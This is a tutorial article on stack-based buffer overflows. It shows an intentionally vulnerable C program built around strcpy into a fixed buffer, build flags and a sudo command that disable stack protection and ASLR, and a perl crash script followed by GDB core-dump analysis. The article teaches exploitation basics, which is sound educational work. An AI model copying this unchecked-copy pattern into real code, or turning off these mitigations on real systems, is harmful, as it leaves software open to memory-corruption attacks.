Secure coding

How to exploit Buffer Overflow

This article provides an overview of buffer overflow vulnerabilities and how they can be exploited. Buffer overflows are commonly seen in programs written in various programming languages.

While there are other programming languages that are susceptible to buffer overflows, C and C++ are popular for this class of attacks. In this article, we’ll explore some of the reasons for buffer overflows and how someone can abuse them to take control of the vulnerable program.

Learn Secure Coding

Build your secure coding skills in C/C++, iOS, Java, .NET, Node.js, PHP and other languages.

Learn More

What is buffer overflow?

Buffer overflow is a class of vulnerability that occurs due to the use of functions that do not perform bounds checking. In simple words, it occurs when more data is put into a fixed-length buffer than the buffer can handle.

It’s better explained using an example. So let’s take the following program as an example.

#include<stdio.h>

#include<string.h>

void vuln_func(char *input);

int main(int argc, char *argv[])

{

if(argc>1)

vuln_func(argv[1]);

}

void vuln_func(char *input)

{

char buffer[256];

strcpy(buffer, input);

}

This is a simple C program which is vulnerable to buffer overflow. If you look closely, we have a function named vuln_func, which is taking a command-line argument. This argument is being passed into a variable called input, which in turn is being copied into another variable called buffer, which is a character array with a length of 256.

However, we are performing this copy using the strcpy function. This function doesn't perform any bounds checking implicitly; thus, we will be able to write more than 256 characters into the variable buffer and buffer overflow occurs. If this overflowing buffer is written onto the stack and if we can somehow overwrite the saved return address of this function, we will be able to control the flow of the entire program. That's the reason why this is called a stack-based buffer overflow.

Types of buffer overflow

We have just discussed an example of stack-based buffer overflow. However, a buffer overflow is not limited to the stack. The following are some of the common buffer overflow types.

Stack-based buffer overflow

When a user-supplied buffer is stored on the stack, it is referred to as a stack-based buffer overflow. As mentioned earlier, a stack-based buffer overflow vulnerability can be exploited by overwriting the return address of a function on the stack.

Heap-based buffer overflow

When a user-supplied buffer is stored on the heap data area, it is referred to as a heap-based buffer overflow. Heap overflows are relatively harder to exploit when compared to stack overflows. The successful exploitation of heap-based buffer overflow vulnerabilities relies on various factors, as there is no return address to overwrite as with the stack-based buffer overflow technique. The user-supplied buffer often overwrites data on the heap to manipulate the program data in an unexpected manner.

Understanding debuggers

Understanding how to use debuggers is a crucial part of exploiting buffer overflows. When writing buffer overflow exploits, we often need to understand the stack layout, memory maps, instruction mnemonics, CPU registers and so on. A debugger can help with dissecting these details for us during the debugging process.

In the Windows environment, OllyDBG and Immunity Debugger are freely available debuggers. GNU Debugger (GDB) is the most commonly used debugger in the Linux environment.

Exploit mitigation techniques

To be able to exploit a buffer overflow vulnerability on a modern operating system, we often need to deal with various exploit mitigation techniques such as stack canaries, data execution prevention, address space layout randomization and more. To keep it simple, let’s proceed with disabling all these protections.

For the purposes of understanding buffer overflow basics, let’s look at a stack-based buffer overflow.

Crashing and analyzing core dumps

In this section, let's explore how one can crash the vulnerable program to be able to write an exploit later. The following makefile can be used to compile this program with all the exploit mitigation techniques disabled in the binary.

all:

gcc -fno-stack-protector vulnerable.c -o vulnerable -z execstack -D_FORTIFY_SOURCE=0

clean:

rm vulnerable

We are simply using gcc and passing the program vulnerable.c as input. We are producing the binary vulnerable as output.

Let’s disable ASLR by writing the value 0 into the file /proc/sys/kernel/randomize_va_space. This looks like the following:

sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"

Now we are fully ready to exploit this vulnerable program.

Let's compile it and produce the executable binary. To do this, run the command make and it should create a new binary for us.

$ make $

We should have a new binary in the current directory. Let’s run the file command against the binary and observe the details.

$ file vulnerable

vulnerable: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9e7fbfc60186b8adfb5cab10496506bb13ae7b0a, for GNU/Linux 3.2.0, not stripped

As we can see, it's an ELF and 64-bit binary. Let’s run the binary with an argument.

$ ./vulnerable test $

Nothing happens. This is intentional: it doesn't do anything apart from taking input and then copying it into another variable using the strcpy function.

Crashing the program

Now let's see how we can crash this application. We're going to create a simple perl program. So we can use it as a template for the rest of the exploit.

Let's create a file called exploit1.pl and simply create a variable. Let's give it three hundred "A"s. We want to produce 300 characters using this perl program so we can use these three hundred "A"s in our attempt to crash the application.

exploit1.pl

#!/usr/bin/perl

$| = 1;

$junk = "A" x 300;

print $junk;

Let us also ensure that the file has executable permissions.

chmod +x exploit1.pl

Now, let's write the output of this file into a file called payload1.

$ ./exploit1.pl > payload1

Let’s simply run the vulnerable program and pass the contents of payload1 as input to the program.

$ ./vulnerable $(cat payload1)

Segmentation fault (core dumped)

As you can see, there is a segmentation fault and the application crashes. Now let's type ls and check if there are any core dumps available in the current directory.

$ ./vulnerable $(cat payload1)

Segmentation fault (core dumped)

$ ls

exploit1.pl Makefile payload1 vulnerable vulnerable.c

If you notice, in the current directory there is nothing like a crash dump. There are no new files created due to the segmentation fault. Let’s enable core dumps so we can understand what caused the segmentation fault.

$ ulimit -c unlimited

This should enable core dumps. Now, let’s crash the application again using the same command that we used earlier. Type ls once again and you should see a new file called core.

$ ./vulnerable $(cat payload1)

Segmentation fault (core dumped)

$ ls

core exploit1.pl Makefile payload1 vulnerable* vulnerable.c

This file is a core dump, which gives us the situation of this program and the time of the crash. We can use this core file to analyze the crash. Let’s see how we can analyze the core file using gdb.

$ gdb -q -core core

GEF for linux ready, type `gef' to start, `gef config' to configure

75 commands loaded for GDB 9.1 using Python engine 3.8

[*] 5 commands could not be loaded, run `gef missing` to know why.

[New LWP 34966]

[!] './vulnerable AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' not found/readable

[!] Failed to get file debug information, most of gef features will not work

Core was generated by `./vulnerable AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0 0x00005555555551ad in ?? ()

gef➤

If you look at this gdb output, it shows that the long input has overwritten RIP somewhere. (RIP is the register that decides which instruction is to be executed.)

If you notice the next instruction to be executed, it is at the address 0x00005555555551ad, which is probably not a valid address. That's the reason why the application crashed. As I mentioned earlier, we can use this core dump to analyze the crash. We can also type info registers to understand what values each register is holding and at the time of crash.

gef➤ info registers

rax 0x7fffffffdd60 0x7fffffffdd60

rbx 0x5555555551b0 0x5555555551b0

rcx 0x80008 0x80008

rdx 0x414141 0x414141

rsi 0x7fffffffe3e0 0x7fffffffe3e0

rdi 0x7fffffffde89 0x7fffffffde89

rbp 0x4141414141414141 0x4141414141414141

rsp 0x7fffffffde68 0x7fffffffde68

r8 0x0 0x0

r9 0x7ffff7fe0d50 0x7ffff7fe0d50

r10 0x0 0x0

r11 0x0 0x0

r12 0x555555555060 0x555555555060

r13 0x7fffffffdf70 0x7fffffffdf70

r14 0x0 0x0

r15 0x0 0x0

rip 0x5555555551ad 0x5555555551ad

eflags 0x10246 [ PF ZF IF RF ]

cs 0x33 0x33

ss 0x2b 0x2b

ds 0x0 0x0

es 0x0 0x0

fs 0x0 0x0

gs 0x0 0x0

gef➤

As I mentioned, RIP is actually overwritten with 0x00005555555551ad and we should notice some characters from our junk, which are 8 As in the RBP register. This is how core dumps can be used.

Let's run the program itself in gdb by typing gdb ./vulnerable and disassemble main using disass main.

gef➤ disass main

Dump of assembler code for function main:

0x0000000000001149 <+0>: endbr64

0x000000000000114d <+4>: push rbp

0x000000000000114e <+5>: mov rbp,rsp

0x0000000000001151 <+8>: sub rsp,0x10

0x0000000000001155 <+12>: mov DWORD PTR [rbp-0x4],edi

0x0000000000001158 <+15>: mov QWORD PTR [rbp-0x10],rsi

0x000000000000115c <+19>: cmp DWORD PTR [rbp-0x4],0x1

0x0000000000001160 <+23>: jle 0x1175 <main+44>

0x0000000000001162 <+25>: mov rax,QWORD PTR [rbp-0x10]

0x0000000000001166 <+29>: add rax,0x8

0x000000000000116a <+33>: mov rax,QWORD PTR [rax]

0x000000000000116d <+36>: mov rdi,rax

0x0000000000001170 <+39>: call 0x117c <vuln_func>

0x0000000000001175 <+44>: mov eax,0x0

0x000000000000117a <+49>: leave

0x000000000000117b <+50>: ret

End of assembler dump.

gef➤

This is the disassembly of our main function. If you notice, within the main program, we have a function called vuln_func. Let us disassemble that using disass vuln_func.

gef➤ disass vuln_func

Dump of assembler code for function vuln_func:

0x000000000000117c <+0>: endbr64

0x0000000000001180 <+4>: push rbp

0x0000000000001181 <+5>: mov rbp,rsp

0x0000000000001184 <+8>: sub rsp,0x110

0x000000000000118b <+15>: mov QWORD PTR [rbp-0x108],rdi

0x0000000000001192 <+22>: mov rdx,QWORD PTR [rbp-0x108]

0x0000000000001199 <+29>: lea rax,[rbp-0x100]

0x00000000000011a0 <+36>: mov rsi,rdx

0x00000000000011a3 <+39>: mov rdi,rax

0x00000000000011a6 <+42>: call 0x1050 <strcpy@plt>

0x00000000000011ab <+47>: nop

0x00000000000011ac <+48>: leave

0x00000000000011ad <+49>: ret

End of assembler dump.

gef➤

If you notice the disassembly of vuln_func, there is a call to strcpy@plt within this function.

Now run the program by passing the contents of payload1 as input.

gef➤ r $(cat payload1)

Starting program: /home/dev/x86_64/simple_bof/vulnerable $(cat payload1)

Program received signal SIGSEGV, Segmentation fault.

0x00005555555551ad in vuln_func ()

[ Legend: Modified register | Code | Heap | Stack | String ]

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────

$rax : 0x00007fffffffdd00 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"

$rbx : 0x00005555555551b0 → <__libc_csu_init+0> endbr64

$rcx : 0x20000

$rdx : 0x11

$rsp : 0x00007fffffffde08 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

$rbp : 0x4141414141414141 ("AAAAAAAA"?)

$rsi : 0x00007fffffffe3a0 → "AAAAAAAAAAAAAAAAA"

$rdi : 0x00007fffffffde1b → "AAAAAAAAAAAAAAAAA"

$rip : 0x00005555555551ad → <vuln_func+49> ret

$r8 : 0x0

$r9 : 0x00007ffff7fe0d50 → endbr64

$r10 : 0x0

$r11 : 0x0

$r12 : 0x0000555555555060 → <_start+0> endbr64

$r13 : 0x00007fffffffdf10 → 0x0000000000000002

$r14 : 0x0

$r15 : 0x0

$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]

$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────

0x00007fffffffde08│+0x0000: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ← $rsp

0x00007fffffffde10│+0x0008: "AAAAAAAAAAAAAAAAAAAAAAAAAAAA"

0x00007fffffffde18│+0x0010: "AAAAAAAAAAAAAAAAAAAA"

0x00007fffffffde20│+0x0018: "AAAAAAAAAAAA"

0x00007fffffffde28│+0x0020: 0x00007f0041414141 ("AAAA"?)

0x00007fffffffde30│+0x0028: 0x00007ffff7ffc620 → 0x0005042c00000000

0x00007fffffffde38│+0x0030: 0x00007fffffffdf18 → 0x00007fffffffe25a → "/home/dev/x86_64/simple_bof/vulnerable"

0x00007fffffffde40│+0x0038: 0x0000000200000000

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────

0x5555555551a6 <vuln_func+42> call 0x555555555050 <strcpy@plt>

0x5555555551ab <vuln_func+47> nop

0x5555555551ac <vuln_func+48> leave

→ 0x5555555551ad <vuln_func+49> ret

[!] Cannot disassemble from $PC

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────

[#0] Id 1, Name: "vulnerable", stopped 0x5555555551ad in vuln_func (), reason: SIGSEGV

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────

[#0] 0x5555555551ad → vuln_func()

───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

gef➤

In the current environment, a GDB extension called GEF is installed. It shows many interesting details, like a debugger with GUI.

Now if you look at the output, this is the same as we have already seen with the coredump. 8 As are overwriting RBP. But we have passed 300 As and we don't know which 8 are among those three hundred As overwriting RBP register.

When exploiting buffer overflows, being able to crash the application is the first step in the process. Using this knowledge, an attacker will begin to understand the exact offsets required to overwrite RIP register to be able to control the flow of the program.

Conclusion

In this article, we discussed what buffer overflow vulnerabilities are, their types and how they can be exploited. We also analyzed a vulnerable application to understand how crashing an application generates core dumps, which will in turn be helpful in developing a working exploit. In the next article, we will discuss how we can use this knowledge to exploit a buffer overflow vulnerability.

Learn Secure Coding

Build your secure coding skills in C/C++, iOS, Java, .NET, Node.js, PHP and other languages.

Learn More

Sources

Buffer Overflow, OWASP
Stack-Based Buffer Overflow Attacks: Explained and Examples, Rapid7
What Is a Buffer Overflow, Acunetix

Posted: August 31, 2020

Srinivas

View Profile

Srinivas is an Information Security professional with 4 years of industry experience in Web, Mobile and Infrastructure Penetration Testing. He is currently a security researcher at Infosec Institute Inc. He holds Offensive Security Certified Professional(OSCP) Certification. He blogs atwww.androidpentesting.com. Email: srini0x00@gmail.com